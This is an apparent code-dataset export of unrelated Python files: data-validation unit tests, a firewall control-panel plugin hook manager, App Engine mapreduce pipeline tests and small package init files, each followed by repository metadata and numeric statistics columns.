attributes = {'a': {'type': 'Integer', 'required': True, 'id': '1'},
'b': {'type': 'DropDown', 'required': True, 'id': '1', 'options': ['cba', 'xyz']},
'c': {'type': 'Decimal', 'required': True, 'id': '1'}}
expected_result = (
[], [], [], ['Row 3: value in column "a" is not allowed (it should be a whole number).'],
{'num_add': 0, 'num_discarded': 0, 'num_needs_correction': 1, 'num_unchanged': 1, 'num_update': 0}
)
self.assertEqual(check_data(data_file, data_db, attributes), expected_result)
def test_check_data_twoForAdd_noError(self):
data_file = {
'453abc': {'a': 123, 'b': 'xyz', 'c': 1.23},
'new_feature_uuid_1': {'a': 1, 'b': 'cba', 'c': 2},
'new_feature_uuid_2': {'a': 2, 'b': 'xyz', 'c': 2}
}
data_db = {
'453abc': {'a': 123, 'b': 'xyz', 'c': 1.23},
'653bnj': {'a': 98, 'b': 'cba', 'c': 1.57}
}
attributes = {
'a': {'type': 'Integer', 'required': True, 'id': '1'},
'b': {'type': 'DropDown', 'required': True, 'id': '1', 'options': ['cba', 'xyz']},
'c': {'type': 'Decimal', 'required': True, 'id': '1'}
}
self.assertEqual(
check_data(data_file, data_db, attributes), (
[{'a': 1, 'b': 'cba', 'c': 2}, {'a': 2, 'b': 'xyz', 'c': 2}], [], [], [], {
'num_add': 2, 'num_discarded': 0, 'num_needs_correction': 0, 'num_unchanged': 1, 'num_update': 0
}
)
)
def test_check_data_twoForAdd_withError(self):
data_from_file = {
'453abc': {'a': 123, 'b': 'xyz', 'c': 1.23}, 'new_feature_uuid_1': {'a': 2, 'b': 'xyz', 'c': 2},
'new_feature_uuid_2': {'a': 1, 'b': 'aaa', 'c': 2}
}
data_from_db = {'453abc': {'a': 123, 'b': 'xyz', 'c': 1.23}, '653bnj': {'a': 98, 'b': 'cba', 'c': 1.57}}
attributes = {'a': {'type': 'Integer', 'required': True, 'id': '1'},
'b': {'type': 'DropDown', 'required': True, 'id': '1', 'options': ['cba', 'xyz']},
'c': {'type': 'Decimal', 'required': True, 'id': '1'}}
expected_result = (
[{'a': 2, 'b': 'xyz', 'c': 2}], [], [], [
'Row 4: value in column "b" is not allowed (it should be one of the predefined values).'], {
'num_add': 1, 'num_discarded': 0, 'num_needs_correction': 1, 'num_unchanged': 1, 'num_update': 0
}
)
self.assertEqual(check_data(data_from_file, data_from_db, attributes), expected_result)
def test_check_data_three_discarded(self):
data_from_file = {
'a': {'a': 123, 'b': 'xyz', 'c': 1.23},
'b': {'a': 2, 'b': 'xyz', 'c': 2},
'c': {'a': 1, 'b': 'aaa', 'c': 2}}
data_from_db = {'453abc': {'a': 123, 'b': 'xyz', 'c': 1.23}, '653bnj': {'a': 98, 'b': 'cba', 'c': 1.57}}
attributes = {'a': {'type': 'Integer', 'required': True, 'id': '1'},
'b': {'type': 'DropDown', 'required': True, 'id': '1', 'options': ['cba', 'xyz']},
'c': {'type': 'Decimal', 'required': True, 'id': '1'}}
self.assertEqual(
check_data(data_from_file, data_from_db, attributes), (
[], [], [], ['Rows 2, 3 and 4 were discarded. (feature_uuid not in database or not blank)'],
{'num_add': 0, 'num_discarded': 3, 'num_needs_correction': 0, 'num_unchanged': 0, 'num_update': 0}
)
)
def test_check_data_changeset_threeUpdate_oneAdd(self):
data_from_file = {
'453abc': {'a': 1, 'b': 'xyz', 'c': 2, 'changeset': '20'},
'653bnj': {'a': 1, 'b': 'xyz', 'c': 2, 'changeset': 20},
'556gbn': {'a': 1, 'b': 'xyz', 'c': 2},
'new_feature_uuid_1': {'a': 1, 'b': 'cba', 'c': 2, 'changeset': '7'}
}
data_from_db = {
'453abc': {'a': 123, 'b': 'xyz', 'c': 1.23, 'changeset_id': 20},
'653bnj': {'a': 123, 'b': 'xyz', 'c': 1.25, 'changeset_id': 20},
'556gbn': {'a': 123, 'b': 'xyz', 'c': 1.23, 'changeset_id': 20}
}
attributes = {
'a': {'type': 'Integer', 'required': True},
'b': {'type': 'DropDown', 'required': True, 'options': ['cba', 'xyz']},
'c': {'type': 'Decimal', 'required': True}
}
expected_result = (
[{'a': 1, 'b': 'cba', 'c': 2, 'changeset': '7'}],
[{'a': 1, 'b': 'xyz', 'c': 2, 'changeset': '20'}, {'a': 1, 'b': 'xyz', 'c': 2, 'changeset': 20},
{'a': 1, 'b': 'xyz', 'c': 2}], [], [], {
'num_add': 1, 'num_discarded': 0, 'num_needs_correction': 0, 'num_unchanged': 0, 'num_update': 3
})
self.assertEqual(check_data(data_from_file, data_from_db, attributes), expected_result)
def test_check_data_changeset_oneDiscarded_twoError(self):
data_from_file = {
'787nmj': {'a': 1, 'b': 'bbb', 'c': 2, 'changeset': '7'},
'789ght': {'a': 1, 'b': 'bbb', 'c': 2, 'changeset': 'a'},
'549uhj': {'a': 1, 'b': 'xyz', 'c': 2, 'changeset': 'a'}
}
data_from_db = {
'787nmj': {'a': 123, 'b': 'xyz', 'c': 1.23, 'changeset_id': 20},
'789ght': {'a': 123, 'b': 'xyz', 'c': 1.23, 'changeset_id': 20},
'549uhj': {'a': 123, 'b': 'xyz', 'c': 2, 'changeset_id': 20}
}
attributes = {
'a': {'type': 'Integer', 'required': True},
'b': {'type': 'DropDown', 'required': True, 'options': ['cba', 'xyz']},
'c': {'type': 'Decimal', 'required': True}
}
expected_result = ([], [], [], [(
'Row 3: value in column "b" is not allowed (it should be one of the predefined values), value in '
'column "changeset" is not allowed (it should be a whole number).'),
'Row 4: value in column "changeset" is not allowed (it should be a whole number).',
'Row 2 was discarded. (changeset is not the most recent one)'], {
'num_add': 0, 'num_discarded': 1, 'num_needs_correction': 2, 'num_unchanged': 0, 'num_update': 0
})
self.assertEqual(check_data(data_from_file, data_from_db, attributes), expected_result)
def test_check_data_changeset_oneAdd_twoUnchanged_oneDiscarded(self):
data_from_file = {
'908hnj': {'a': 1, 'b': 'aaa', 'c': 2, 'changeset': '7'},
'897bnj': {'a': 1, 'b': 'aaa', 'c': 2, 'changeset': '20'}
}
data_from_db = {
'908hnj': {'a': 1, 'b': 'aaa', 'c': 2, 'changeset_id': 20},
'897bnj': {'a': 1, 'b': 'aaa', 'c': 2, 'changeset_id': 20}
}
attributes = {
'a': {'type': 'Integer', 'required': True},
'b': {'type': 'DropDown', 'required': True, 'options': ['cba', 'xyz']},
'c': {'type': 'Decimal', 'required': True}
}
expected_result = (
[], [], [], ['Row 2 was discarded. (changeset is not the most recent one)'], {
'num_add': 0, 'num_discarded': 1, 'num_needs_correction': 0, 'num_unchanged': 1, 'num_update': 0
})
self.assertEqual(check_data(data_from_file, data_from_db, attributes), expected_result)
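# The for_update tests above pin down its contract: an update is needed only
# when a key present in *both* rows carries different values, while keys that
# exist on just one side are ignored. A minimal sketch consistent with those
# tests (the real implementation lives in .functions and may differ):
def for_update_sketch(row_file, row_db):
    """Return True if any column shared by both rows has differing values."""
    shared_keys = set(row_file) & set(row_db)
    return any(row_file[key] != row_db[key] for key in shared_keys)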
if __name__ == '__main__':
unittest.main()
| 47.336842 | 119 | 0.506427 | 2,718 | 22,485 | 3.996689 | 0.066593 | 0.055233 | 0.017491 | 0.040044 | 0.874804 | 0.842953 | 0.80429 | 0.771518 | 0.739575 | 0.709012 | 0 | 0.048375 | 0.277385 | 22,485 | 474 | 120 | 47.436709 | 0.620199 | 0.000934 | 0 | 0.394737 | 0 | 0.015789 | 0.267563 | 0 | 0 | 0 | 0 | 0 | 0.1 | 1 | 0.1 | false | 0 | 0.010526 | 0 | 0.113158 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0 | 6 | 463afbd78683c87845fac6bedfa6cb0506f041fe | 6,781 | py | Python | firewall/pluginManager.py | uzairAK/serverom-panel | 3dcde05ad618e6bef280db7d3180f926fe2ab1db | ["MIT"] | null | null | null | firewall/pluginManager.py | uzairAK/serverom-panel | 3dcde05ad618e6bef280db7d3180f926fe2ab1db | ["MIT"] | null | null | null | firewall/pluginManager.py | uzairAK/serverom-panel | 3dcde05ad618e6bef280db7d3180f926fe2ab1db | ["MIT"] | null | null | null |
from .signals import *
from plogical.pluginManagerGlobal import pluginManagerGlobal
class pluginManager:
@staticmethod
def preFirewallHome(request):
return pluginManagerGlobal.globalPlug(request, preFirewallHome)
@staticmethod
def postFirewallHome(request, response):
return pluginManagerGlobal.globalPlug(request, postFirewallHome, response)
@staticmethod
def preAddRule(request):
return pluginManagerGlobal.globalPlug(request, preAddRule)
@staticmethod
def postAddRule(request, response):
return pluginManagerGlobal.globalPlug(request, postAddRule, response)
@staticmethod
def preDeleteRule(request):
return pluginManagerGlobal.globalPlug(request, preDeleteRule)
@staticmethod
def postDeleteRule(request, response):
return pluginManagerGlobal.globalPlug(request, postDeleteRule, response)
@staticmethod
def preReloadFirewall(request):
return pluginManagerGlobal.globalPlug(request, preReloadFirewall)
@staticmethod
def postReloadFirewall(request, response):
return pluginManagerGlobal.globalPlug(request, postReloadFirewall, response)
@staticmethod
def preStartFirewall(request):
return pluginManagerGlobal.globalPlug(request, preStartFirewall)
@staticmethod
def postStartFirewall(request, response):
return pluginManagerGlobal.globalPlug(request, postStartFirewall, response)
@staticmethod
def preStopFirewall(request):
return pluginManagerGlobal.globalPlug(request, preStopFirewall)
@staticmethod
def postStopFirewall(request, response):
return pluginManagerGlobal.globalPlug(request, postStopFirewall, response)
@staticmethod
def preFirewallStatus(request):
return pluginManagerGlobal.globalPlug(request, preFirewallStatus)
@staticmethod
def postFirewallStatus(request, response):
return pluginManagerGlobal.globalPlug(request, postFirewallStatus, response)
@staticmethod
def preSecureSSH(request):
return pluginManagerGlobal.globalPlug(request, preSecureSSH)
@staticmethod
def postSecureSSH(request, response):
return pluginManagerGlobal.globalPlug(request, postSecureSSH, response)
@staticmethod
def preSaveSSHConfigs(request):
return pluginManagerGlobal.globalPlug(request, preSaveSSHConfigs)
@staticmethod
def postSaveSSHConfigs(request, response):
return pluginManagerGlobal.globalPlug(request, postSaveSSHConfigs, response)
@staticmethod
def preDeleteSSHKey(request):
return pluginManagerGlobal.globalPlug(request, preDeleteSSHKey)
@staticmethod
def postDeleteSSHKey(request, response):
return pluginManagerGlobal.globalPlug(request, postDeleteSSHKey, response)
@staticmethod
def preAddSSHKey(request):
return pluginManagerGlobal.globalPlug(request, preAddSSHKey)
@staticmethod
def postAddSSHKey(request, response):
return pluginManagerGlobal.globalPlug(request, postAddSSHKey, response)
@staticmethod
def preLoadModSecurityHome(request):
return pluginManagerGlobal.globalPlug(request, preLoadModSecurityHome)
@staticmethod
def postLoadModSecurityHome(request, response):
return pluginManagerGlobal.globalPlug(request, postLoadModSecurityHome, response)
@staticmethod
def preSaveModSecConfigurations(request):
return pluginManagerGlobal.globalPlug(request, preSaveModSecConfigurations)
@staticmethod
def postSaveModSecConfigurations(request, response):
return pluginManagerGlobal.globalPlug(request, postSaveModSecConfigurations, response)
@staticmethod
def preModSecRules(request):
return pluginManagerGlobal.globalPlug(request, preModSecRules)
@staticmethod
def postModSecRules(request, response):
return pluginManagerGlobal.globalPlug(request, postModSecRules, response)
@staticmethod
def preSaveModSecRules(request):
return pluginManagerGlobal.globalPlug(request, preSaveModSecRules)
@staticmethod
def postSaveModSecRules(request, response):
return pluginManagerGlobal.globalPlug(request, postSaveModSecRules, response)
@staticmethod
def preModSecRulesPacks(request):
return pluginManagerGlobal.globalPlug(request, preModSecRulesPacks)
@staticmethod
def postModSecRulesPacks(request, response):
return pluginManagerGlobal.globalPlug(request, postModSecRulesPacks, response)
@staticmethod
def preGetOWASPAndComodoStatus(request):
return pluginManagerGlobal.globalPlug(request, preGetOWASPAndComodoStatus)
@staticmethod
def postGetOWASPAndComodoStatus(request, response):
return pluginManagerGlobal.globalPlug(request, postGetOWASPAndComodoStatus, response)
@staticmethod
def preInstallModSecRulesPack(request):
return pluginManagerGlobal.globalPlug(request, preInstallModSecRulesPack)
@staticmethod
def postInstallModSecRulesPack(request, response):
return pluginManagerGlobal.globalPlug(request, postInstallModSecRulesPack, response)
@staticmethod
def preGetRulesFiles(request):
return pluginManagerGlobal.globalPlug(request, preGetRulesFiles)
@staticmethod
def postGetRulesFiles(request, response):
return pluginManagerGlobal.globalPlug(request, postGetRulesFiles, response)
@staticmethod
def preEnableDisableRuleFile(request):
return pluginManagerGlobal.globalPlug(request, preEnableDisableRuleFile)
@staticmethod
def postEnableDisableRuleFile(request, response):
return pluginManagerGlobal.globalPlug(request, postEnableDisableRuleFile, response)
@staticmethod
def preCSF(request):
return pluginManagerGlobal.globalPlug(request, preCSF)
@staticmethod
def postCSF(request, response):
return pluginManagerGlobal.globalPlug(request, postCSF, response)
@staticmethod
def preChangeStatus(request):
return pluginManagerGlobal.globalPlug(request, preChangeStatus)
@staticmethod
def postChangeStatus(request, response):
return pluginManagerGlobal.globalPlug(request, postChangeStatus, response)
@staticmethod
def preModifyPorts(request):
return pluginManagerGlobal.globalPlug(request, preModifyPorts)
@staticmethod
def postModifyPorts(request, response):
return pluginManagerGlobal.globalPlug(request, postModifyPorts, response)
@staticmethod
def preModifyIPs(request):
return pluginManagerGlobal.globalPlug(request, preModifyIPs)
@staticmethod
def postModifyIPs(request, response):
return pluginManagerGlobal.globalPlug(request, postModifyIPs, response)
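# Every pair of methods above repeats the same pre/post delegation pattern. A
# hedged refactoring sketch showing how such pairs could be generated in one
# place (illustrative only; the explicit methods above remain the interface):
def _make_hooks(pre_signal, post_signal):
    """Build a (pre, post) pair of static hook methods for one signal pair."""
    def pre(request):
        return pluginManagerGlobal.globalPlug(request, pre_signal)

    def post(request, response):
        return pluginManagerGlobal.globalPlug(request, post_signal, response)

    return staticmethod(pre), staticmethod(post)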
| 34.596939 | 94 | 0.764342 | 490 | 6,781 | 10.577551 | 0.12449 | 0.138916 | 0.324137 | 0.388964 | 0.490835 | 0.26394 | 0 | 0 | 0 | 0 | 0 | 0 | 0.171361 | 6,781 | 196 | 95 | 34.596939 | 0.922406 | 0 | 0 | 0.326531 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.326531 | false | 0 | 0.013605 | 0.326531 | 0.673469 | 0 | 0 | 0 | 1 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 |
0 | 6 | 4659ef8ad5a56ccb89b28121d451b5638378d319 | 12,439 | py | Python | python/test/mapreduce/mapper_pipeline_test.py | rolepoint/appengine-mapreduce | 8710047353b8cb37938ec170c3019dfb099e5697 | ["Apache-2.0"] | null | null | null | python/test/mapreduce/mapper_pipeline_test.py | rolepoint/appengine-mapreduce | 8710047353b8cb37938ec170c3019dfb099e5697 | ["Apache-2.0"] | 1 | 2015-01-30T02:50:09.000Z | 2015-01-30T02:52:00.000Z | python/test/mapreduce/mapper_pipeline_test.py | rolepoint/appengine-mapreduce | 8710047353b8cb37938ec170c3019dfb099e5697 | ["Apache-2.0"] | null | null | null |
#!/usr/bin/env python
# Copyright 2011 Google Inc. All Rights Reserved.
# pylint: disable=g-bad-name

import datetime
import unittest

from mapreduce.lib import pipeline
from google.appengine.api import files
from google.appengine.ext import db
from mapreduce import context
from mapreduce import errors
from mapreduce import input_readers
from mapreduce import mapper_pipeline
from mapreduce import model
from mapreduce import output_writers
from mapreduce import test_support
from testlib import testutil


class TestEntity(db.Model):
  """Test entity class."""
  data = db.StringProperty()
  dt = db.DateTimeProperty(default=datetime.datetime(2000, 1, 1))


class TestOutputEntity(db.Model):
  """TestOutput entity class."""
  data = db.StringProperty()


class RetryCount(db.Model):
  """Use to keep track of slice/shard retries."""
  retries = db.IntegerProperty()


def test_fail_map(_):
  """Always fail job immediately."""
  raise errors.FailJobError()


def test_slice_retry_map(entity):
  """Raise exception for 11 times when data is 100."""
  if entity.data == "100":
    retry_count = RetryCount.get_by_key_name(entity.data)
    if not retry_count:
      retry_count = RetryCount(key_name=entity.data, retries=0)
    if retry_count.retries < 11:
      retry_count.retries += 1
      retry_count.put()
      raise Exception()
  TestOutputEntity(key_name=entity.data, data=entity.data).put()


def test_shard_retry_map(entity):
  """Raise exception 12 times when data is 100."""
  if entity.data == "100":
    retry_count = RetryCount.get_by_key_name(entity.data)
    if not retry_count:
      retry_count = RetryCount(key_name=entity.data, retries=0)
    if retry_count.retries < 12:
      retry_count.retries += 1
      retry_count.put()
      raise Exception()
  TestOutputEntity(key_name=entity.data, data=entity.data).put()


def test_shard_retry_too_many_map(entity):
  """Raise shard retry exception 45 times when data is 100."""
  if entity.data == "100":
    retry_count = RetryCount.get_by_key_name(entity.data)
    if not retry_count:
      retry_count = RetryCount(key_name=entity.data, retries=0)
    if retry_count.retries < 45:
      retry_count.retries += 1
      retry_count.put()
      raise Exception()
  TestOutputEntity(key_name=entity.data, data=entity.data).put()


def test_map(entity):
  """Test map handler."""
  yield (entity.data, "")


def test_empty_handler(entity):
  """Test handler that does nothing."""
  pass


class CleanupPipelineTest(testutil.HandlerTestBase):
  """Tests for the CleanupPipeline class."""

  def setUp(self):
    testutil.HandlerTestBase.setUp(self)
    pipeline.Pipeline._send_mail = self._send_mail
    self.emails = []

  def _send_mail(self, sender, subject, body, html=None):
    """Callback function for sending mail."""
    self.emails.append((sender, subject, body, html))

  def testCleanup_Flat(self):
    """Tests cleaning up a flat list of files."""
    # Prepare test data
    entity_count = 200
    for i in range(entity_count):
      TestEntity(data=str(i)).put()
      TestEntity(data=str(i)).put()

    # Run map
    p = mapper_pipeline.MapperPipeline(
        "test",
        handler_spec=__name__ + ".test_map",
        input_reader_spec=input_readers.__name__ + ".DatastoreInputReader",
        output_writer_spec=
            output_writers.__name__ + ".KeyValueBlobstoreOutputWriter",
        params={
            "input_reader": {
                "entity_kind": __name__ + ".TestEntity",
            },
        },
    )
    p.start()
    test_support.execute_until_empty(self.taskqueue)
    finished_map = mapper_pipeline.MapperPipeline.from_id(p.pipeline_id)

    # Can open files
    file_list = finished_map.outputs.default.value
    self.assertTrue(len(file_list) > 0)
    for name in file_list:
      files.open(name, "r").read(0)

    # Cleanup
    cleanup = mapper_pipeline._CleanupPipeline(file_list)
    cleanup.start()
    test_support.execute_until_empty(self.taskqueue)

    # Cannot open files
    for name in file_list:
      self.assertRaises(files.Error, files.open, name, "r")

  def testCleanup_ListOfLists(self):
    """Tests cleaning up a list of file lists."""
    # Prepare test data
    entity_count = 200
    for i in range(entity_count):
      TestEntity(data=str(i)).put()
      TestEntity(data=str(i)).put()

    # Run map
    p = mapper_pipeline.MapperPipeline(
        "test",
        handler_spec=__name__ + ".test_map",
        input_reader_spec=input_readers.__name__ + ".DatastoreInputReader",
        output_writer_spec=
            output_writers.__name__ + ".KeyValueBlobstoreOutputWriter",
        params={
            "input_reader": {
                "entity_kind": __name__ + ".TestEntity",
            },
        },
    )
    p.start()
    test_support.execute_until_empty(self.taskqueue)
    finished_map = mapper_pipeline.MapperPipeline.from_id(p.pipeline_id)

    # Can open files
    file_list = finished_map.outputs.default.value
    self.assertTrue(len(file_list) > 0)
    for name in file_list:
      files.open(name, "r").read(0)

    grouped_list = [file_list]

    # Cleanup
    cleanup = mapper_pipeline._CleanupPipeline(grouped_list)
    cleanup.start()
    test_support.execute_until_empty(self.taskqueue)

    # Cannot open files
    for name in file_list:
      self.assertRaises(files.Error, files.open, name, "r")


class MapperPipelineTest(testutil.HandlerTestBase):
  """Tests for MapperPipeline."""

  def setUp(self):
    testutil.HandlerTestBase.setUp(self)
    pipeline.Pipeline._send_mail = self._send_mail
    self.emails = []

  def _send_mail(self, sender, subject, body, html=None):
    """Callback function for sending mail."""
    self.emails.append((sender, subject, body, html))

  def testEmptyMapper(self):
    """Test empty mapper over empty dataset."""
    p = mapper_pipeline.MapperPipeline(
        "empty_map",
        handler_spec=__name__ + ".test_empty_handler",
        input_reader_spec=input_readers.__name__ + ".DatastoreInputReader",
        params={
            "input_reader": {
                "entity_kind": __name__ + ".TestEntity",
                # Test datetime can be json serialized.
                "filters": [("dt", "=", datetime.datetime(2000, 1, 1))],
            },
        },
    )
    p.start()
    test_support.execute_until_empty(self.taskqueue)

    self.assertEquals(1, len(self.emails))
    self.assertTrue(self.emails[0][1].startswith(
        "Pipeline successful:"))

    p = mapper_pipeline.MapperPipeline.from_id(p.pipeline_id)
    # Verify outputs.
    # Counter output
    counters = p.outputs.counters.value
    self.assertTrue(counters)
    self.assertTrue(context.COUNTER_MAPPER_WALLTIME_MS in counters)
    # Default output.
    self.assertEqual([], p.outputs.default.value)
    # Job id output.
    self.assertTrue(p.outputs.job_id.filled)
    state = model.MapreduceState.get_by_job_id(p.outputs.job_id.value)
    self.assertEqual(model.MapreduceState.RESULT_SUCCESS, state.result_status)
    # Result status output.
    self.assertEqual(model.MapreduceState.RESULT_SUCCESS,
                     p.outputs.result_status.value)

  def testFailedMap(self):
    for i in range(1):
      TestEntity(data=str(i)).put()

    pipeline.pipeline._DEFAULT_MAX_ATTEMPTS = 1

    p = mapper_pipeline.MapperPipeline(
        "test",
        handler_spec=__name__ + ".test_fail_map",
        input_reader_spec=input_readers.__name__ + ".DatastoreInputReader",
        params={
            "input_reader": {
                "entity_kind": __name__ + "." + TestEntity.__name__,
            },
        },
        shards=5)
    p.start()
    test_support.execute_until_empty(self.taskqueue)

    p = mapper_pipeline.MapperPipeline.from_id(p.pipeline_id)
    self.assertTrue(p.was_aborted)

    self.assertTrue(p.outputs.job_id.filled)
    state = model.MapreduceState.get_by_job_id(p.outputs.job_id.value)
    self.assertEqual(model.MapreduceState.RESULT_FAILED, state.result_status)
    self.assertFalse(p.outputs.result_status.filled)
    self.assertFalse(p.outputs.default.filled)

    self.assertEquals(1, len(self.emails))
    self.assertTrue(self.emails[0][1].startswith(
        "Pipeline aborted:"))

  def testProcessEntities(self):
    """Test empty mapper over non-empty dataset."""
    for _ in range(100):
      TestEntity().put()

    p = mapper_pipeline.MapperPipeline(
        "empty_map",
        handler_spec=__name__ + ".test_empty_handler",
        input_reader_spec=input_readers.__name__ + ".DatastoreInputReader",
        params={
            "input_reader": {
                "entity_kind": __name__ + ".TestEntity",
            },
        },
    )
    p.start()
    test_support.execute_until_empty(self.taskqueue)

    self.assertEquals(1, len(self.emails))
    self.assertTrue(self.emails[0][1].startswith(
        "Pipeline successful:"))

    p = mapper_pipeline.MapperPipeline.from_id(p.pipeline_id)
    self.assertTrue(p.outputs.job_id.filled)

    counters = p.outputs.counters.value
    self.assertTrue(counters)
    self.assertTrue(context.COUNTER_MAPPER_WALLTIME_MS in counters)
    self.assertEquals(100, counters[context.COUNTER_MAPPER_CALLS])

    self.assertEqual(model.MapreduceState.RESULT_SUCCESS,
                     p.outputs.result_status.value)
    self.assertEqual([], p.outputs.default.value)

  def testSliceRetry(self):
    entity_count = 200
    db.delete(TestOutputEntity.all())
    db.delete(RetryCount.all())

    for i in range(entity_count):
      TestEntity(data=str(i)).put()

    p = mapper_pipeline.MapperPipeline(
        "test",
        handler_spec=__name__ + ".test_slice_retry_map",
        input_reader_spec=input_readers.__name__ + ".DatastoreInputReader",
        params={
            "input_reader": {
                "entity_kind": __name__ + "." + TestEntity.__name__,
            },
        },
        shards=5)
    p.start()
    test_support.execute_until_empty(self.taskqueue)

    self.assertEquals(1, len(self.emails))
    self.assertTrue(self.emails[0][1].startswith(
        "Pipeline successful:"))

    p = mapper_pipeline.MapperPipeline.from_id(p.pipeline_id)
    outputs = []
    for output in TestOutputEntity.all():
      outputs.append(int(output.data))
    outputs.sort()

    expected_outputs = [i for i in range(entity_count)]
    expected_outputs.sort()
    self.assertEquals(expected_outputs, outputs)

  def testShardRetry(self):
    entity_count = 200
    db.delete(TestOutputEntity.all())
    db.delete(RetryCount.all())

    for i in range(entity_count):
      TestEntity(data=str(i)).put()

    p = mapper_pipeline.MapperPipeline(
        "test",
        handler_spec=__name__ + ".test_shard_retry_map",
        input_reader_spec=input_readers.__name__ + ".DatastoreInputReader",
        params={
            "input_reader": {
                "entity_kind": __name__ + "." + TestEntity.__name__,
            },
        },
        shards=5)
    p.start()
    test_support.execute_until_empty(self.taskqueue)

    self.assertEquals(1, len(self.emails))
    self.assertTrue(self.emails[0][1].startswith(
        "Pipeline successful:"))

    p = mapper_pipeline.MapperPipeline.from_id(p.pipeline_id)
    outputs = []
    for output in TestOutputEntity.all():
      outputs.append(int(output.data))
    outputs.sort()

    expected_outputs = [i for i in range(entity_count)]
    expected_outputs.sort()
    self.assertEquals(expected_outputs, outputs)

  def testShardRetryTooMany(self):
    entity_count = 200
    db.delete(TestOutputEntity.all())
    db.delete(RetryCount.all())

    for i in range(entity_count):
      TestEntity(data=str(i)).put()

    p = mapper_pipeline.MapperPipeline(
        "test",
        handler_spec=__name__ + ".test_shard_retry_too_many_map",
        input_reader_spec=input_readers.__name__ + ".DatastoreInputReader",
        params={
            "input_reader": {
                "entity_kind": __name__ + "." + TestEntity.__name__,
            },
        },
        shards=5)
    p.max_attempts = 1
    p.start()
    test_support.execute_until_empty(self.taskqueue)

    state = model.MapreduceState.all().get()
    self.assertEqual(model.MapreduceState.RESULT_FAILED, state.result_status)

    self.assertEquals(1, len(self.emails))
    self.assertTrue(self.emails[0][1].startswith(
        "Pipeline aborted:"))


if __name__ == "__main__":
  unittest.main()
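Every test above repeats the same four-step cycle: construct a MapperPipeline, start it, drain the stub task queue with test_support.execute_until_empty, then reload the pipeline record by id to inspect its outputs. A sketch of that shared cycle as one helper, using only names already imported in this file (the run_mapper helper itself is illustrative, not part of the suite):

def run_mapper(test_case, handler_name, entity_kind, shards=5):
  # Illustrative consolidation of the construct -> start -> drain -> reload
  # cycle the tests above repeat; not part of the original test suite.
  p = mapper_pipeline.MapperPipeline(
      "test",
      handler_spec=handler_name,
      input_reader_spec=input_readers.__name__ + ".DatastoreInputReader",
      params={"input_reader": {"entity_kind": entity_kind}},
      shards=shards)
  p.start()
  # Executes queued mapreduce tasks until the stub queue is empty.
  test_support.execute_until_empty(test_case.taskqueue)
  return mapper_pipeline.MapperPipeline.from_id(p.pipeline_id)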
| 30.191748
| 78
| 0.669829
| 1,469
| 12,439
| 5.396869
| 0.138189
| 0.031786
| 0.052977
| 0.047553
| 0.799823
| 0.755424
| 0.743567
| 0.741297
| 0.741297
| 0.734738
| 0
| 0.010436
| 0.214246
| 12,439
| 411
| 79
| 30.265207
| 0.800696
| 0.076855
| 0
| 0.723549
| 0
| 0
| 0.069338
| 0.026364
| 0
| 0
| 0
| 0
| 0.122867
| 1
| 0.061433
| false
| 0.003413
| 0.044369
| 0
| 0.136519
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
469dca0b079020ec732b7d643edce4955e33299f
| 106
|
py
|
Python
|
cased/plugins/__init__.py
|
cased/cased-python
|
e3c529e3fe816331277812bf4e3db537eb5a54fc
|
[
"MIT"
] | null | null | null |
cased/plugins/__init__.py
|
cased/cased-python
|
e3c529e3fe816331277812bf4e3db537eb5a54fc
|
[
"MIT"
] | null | null | null |
cased/plugins/__init__.py
|
cased/cased-python
|
e3c529e3fe816331277812bf4e3db537eb5a54fc
|
[
"MIT"
] | null | null | null |
from cased.plugins.casedplugin import DataPlugin
from cased.plugins.casedplugin import CasedDefaultPlugin
| 35.333333
| 56
| 0.886792
| 12
| 106
| 7.833333
| 0.583333
| 0.191489
| 0.340426
| 0.574468
| 0.702128
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.075472
| 106
| 2
| 57
| 53
| 0.959184
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
46a22e4eb342d4b6aa4a45089fe8603feb3934f5
| 81
|
py
|
Python
|
n_in_a_row/game_state/__init__.py
|
olokshyn/n_in_a_row
|
d47c16b58c755d640ced4e74854fa37653304e5d
|
[
"MIT"
] | null | null | null |
n_in_a_row/game_state/__init__.py
|
olokshyn/n_in_a_row
|
d47c16b58c755d640ced4e74854fa37653304e5d
|
[
"MIT"
] | null | null | null |
n_in_a_row/game_state/__init__.py
|
olokshyn/n_in_a_row
|
d47c16b58c755d640ced4e74854fa37653304e5d
|
[
"MIT"
] | null | null | null |
from .game_state import GameState
from .game_tree_builder import GameTreeBuilder
| 27
| 46
| 0.876543
| 11
| 81
| 6.181818
| 0.727273
| 0.235294
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.098765
| 81
| 2
| 47
| 40.5
| 0.931507
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
